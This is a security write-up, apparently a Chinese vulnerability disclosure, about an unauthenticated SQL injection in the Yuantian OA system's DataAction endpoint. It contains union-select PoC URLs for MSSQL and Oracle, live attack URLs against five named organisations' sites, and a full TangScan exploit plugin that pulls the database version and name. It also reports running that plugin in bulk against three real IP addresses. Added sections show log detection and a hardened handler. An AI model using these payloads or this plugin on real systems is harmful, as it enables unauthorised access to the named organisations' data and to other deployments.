
Generic SQL injection vulnerability in an OA system - Computer Resources

Computer Resources  Date: 2019-01-01

    1) Generic SQL injection vulnerability. Vendor: 源天軟件

    Website: http://www.visionsoft.com.cn/

    Vulnerable endpoint: ServiceAction/com.velcro.base.DataAction

    Description: this OA system is deployed on two database types, MSSQL and Oracle; the cases below give an exploitation PoC for each type.

    Exploitation PoC:

    MsSql數(shù)據(jù)庫:

    ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true

    Oracle數(shù)據(jù)庫:

    ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

    (Case URLs; opening them directly is enough):

    MSSQL cases

    A)http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    B)http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    C)http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    Oracle cases

    D)http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

    E)http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true
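From a defender's side, the PoCs above have a very recognisable shape in web server logs: a request to the DataAction endpoint whose `sql` parameter carries a whole statement, with spaces written as `|20` and a `union all select` appended. The following is an added example (not code from the page or from the vendor) that normalises that encoding and flags such requests in access-log lines. The log lines, the client addresses and the helper names (`normalize_sql_param`, `classify`, `scan_log`) are constructed for the example; only the endpoint path and the payload shape come from the page. The `|XX` to `%XX` rewrite is an assumption drawn from how the PoCs are written.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines in common log format (not taken from the page);
# client addresses are documentation ranges and the paths mirror the PoC shape.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jul/2015:10:00:01 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/Jul/2015:10:00:02 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true HTTP/1.1" 200 640',
    '198.51.100.7 - - [22/Jul/2015:10:00:03 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=42&isworkflow=true HTTP/1.1" 200 300',
    '198.51.100.7 - - [22/Jul/2015:10:00:04 +0800] "GET /index.jsp HTTP/1.1" 200 1024',
]

ENDPOINT = "/ServiceAction/com.velcro.base.DataAction"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
PIPE_HEX_RE = re.compile(r"\|([0-9A-Fa-f]{2})")


def normalize_sql_param(target):
    """Return the decoded `sql` parameter of a DataAction request, or None."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    # The page's PoCs write spaces as `|20`; treat `|XX` like `%XX` before
    # decoding so one rule sees both spellings (assumption about the app's encoding).
    query = PIPE_HEX_RE.sub(r"%\1", parts.query)
    values = parse_qs(query, keep_blank_values=True).get("sql")
    if not values:
        return None
    # A second decode pass catches double-encoded payloads; harmless otherwise.
    return unquote(values[0])


def classify(sql):
    """Label a decoded sql parameter.

    Any client-supplied SQL reaching this endpoint is the design flaw itself;
    the union / tautology shape is what the page's PoCs look like.
    """
    lowered = " ".join(sql.lower().split())
    if UNION_RE.search(lowered) or " and 1=2 " in lowered:
        return "union-injection"
    return "client-supplied-sql"


def scan_log(lines):
    """Return (client_ip, label, decoded_sql) for every DataAction request found."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        sql = normalize_sql_param(match.group("target"))
        if sql is None:
            continue
        hits.append((line.split(" ", 1)[0], classify(sql), sql))
    return hits


if __name__ == "__main__":
    for ip, label, sql in scan_log(SAMPLE_LOG):
        print("%s  %-20s  %s" % (ip, label, sql.strip()))
```

Note that the third sample line is flagged too, even though it carries no injection: an endpoint that executes whatever `sql` the client sends is the finding, and a scan that only looks for `union` would miss the benign-looking traffic that proves the endpoint is reachable.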

    2) As promised, to support TangScan I'm giving the finished plugin code directly (I'm no coder, it's hastily written; experts, go easy). By the time this is published the plugin is already in the TangScan.com library.

#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)
See the file 'docs/COPYING' for copying permission

author: fate0
"""

import re

from thirdparty import requests
from modules.exploit import TSExploit

__all__ = ['TangScan']


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "源天軟件OA辦公系統 sql 注入MSSQL版漏洞(無需登錄)",
            "product": "源天",
            "product_version": "",
            "desc": """
                OA辦公系統 /ServiceAction/com.velcro.base.DataAction 中的 sql 參數存在注入, 將導致敏感數據泄漏
            """,
            "license": self.license.TS,
            "author": ["Coody"],
            "ref": [
                {self.ref.wooyun: "暫無"},
            ],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "2015-07-22",
            "create_date": "2015-07-23",
        }

        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目標 url"
            }
        })

        self.register_result({
            "status": False,
            "data": {
                "db_info": {
                    "version": "",
                    "current_db": ""
                }
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        self.print_debug("verify start")

        # The tags that originally enclosed (.+?) are not preserved on the page.
        re_version_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_version_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.version = re_result[0]
        self.result.description = "目標 {url} 存在sql注入, 目標使用數據庫版本為: {db_version}".format(
            url=self.option.url,
            db_version=re_result[0]
        )

    def exploit(self):
        self.print_debug("exploit start")

        # Same pattern as in verify(); the enclosing tags are not preserved on the page.
        re_userinfo_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.current_db = re_result[0]
        self.result.description = "目標 {url} 存在sql注入, 數據庫名稱為: {current_db}".format(
            url=self.option.url,
            current_db=self.result.data.db_info.current_db
        )


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())
看下執(zhí)行插件后的結(jié)果:

    執(zhí)行 --mode verify (默認)

   

    執(zhí)行 --mode exploit

   

    插件運行正常,能夠順利輸出數(shù)據(jù),


    This should have been the end of it

    but I couldn't help myself

    so here are the results of the batch detection script against several sites

    The sites tested were:

    http://60.12.113.234:8080/

    http://121.14.195.31:8081/

    http://218.246.22.194:8080/

    During the test, --mode exploit was run directly to collect the database names in bulk.

    Once the test finished, here are the contents of the result file success.txt

    Well, that's where it ends...

Remediation:

    Filter the input.
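The one-word fix above is the page's whole remediation, and a filter on a parameter whose value is an entire SQL statement is very hard to get right: the endpoint's design is the bug, because the server executes whatever statement the client supplies. The following is an added example (not the vendor's code; the endpoint has a Java-style class name, and here Python with the standard-library sqlite3 module stands in for MSSQL or Oracle) that shows the vulnerable handler shape the page describes beside a hardened handler, where the client may only name a server-defined query and every value is bound as a parameter. The `project` table, the `data_action_vulnerable` / `data_action_hardened` names and the `NAMED_QUERIES` allowlist are assumptions made for the example; the `union all select` payload shape is the page's PoC with the selected expression replaced by a literal.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema mirroring the `project` table named in the PoCs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE project (id INTEGER PRIMARY KEY, categoryids TEXT)")
    conn.executemany("INSERT INTO project VALUES (?, ?)", [(1, "10,11"), (2, "12")])
    return conn


# Vulnerable shape (what the page describes): the `sql` request parameter is
# executed exactly as received, so no filter on its content can be complete.
def data_action_vulnerable(conn, params):
    return conn.execute(params["sql"]).fetchall()


# Hardened shape: the client chooses a query *name*; the SQL text lives only on
# the server and every client value is bound, never concatenated.
NAMED_QUERIES = {
    # query name -> (statement with placeholders, ordered parameter names)
    "project_categories": ("SELECT categoryids FROM project WHERE id = ?", ("id",)),
}


class RejectedRequest(ValueError):
    """Raised for an unknown query name or a value that fails type validation."""


def data_action_hardened(conn, params):
    query_name = params.get("query")
    if query_name not in NAMED_QUERIES:
        raise RejectedRequest("unknown query %r" % query_name)
    sql, arg_names = NAMED_QUERIES[query_name]
    try:
        # `id` is an integer column: coerce before binding so junk such as
        # "1 or 1=1" is rejected by type, not by string matching.
        args = tuple(int(params[name]) for name in arg_names)
    except (KeyError, ValueError) as exc:
        raise RejectedRequest("bad argument: %s" % exc)
    return conn.execute(sql, args).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The page's PoC shape, with `@@version` swapped for a literal so it runs on sqlite.
    payload = "select categoryids from project where id='' and 1=2 union all select 'leaked'"
    print("vulnerable:", data_action_vulnerable(db, {"sql": payload}))
    print("hardened:  ", data_action_hardened(db, {"query": "project_categories", "id": "1"}))
    try:
        data_action_hardened(db, {"query": "project_categories", "id": "1 or 1=1"})
    except RejectedRequest as exc:
        print("hardened rejected:", exc)
```

The hardened handler still accepts the `isworkflow`-style flags or any other parameter the page shows, since it ignores what it does not bind; the point is that nothing the client sends is ever parsed as SQL, which is what a filter is trying, and failing, to guarantee.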
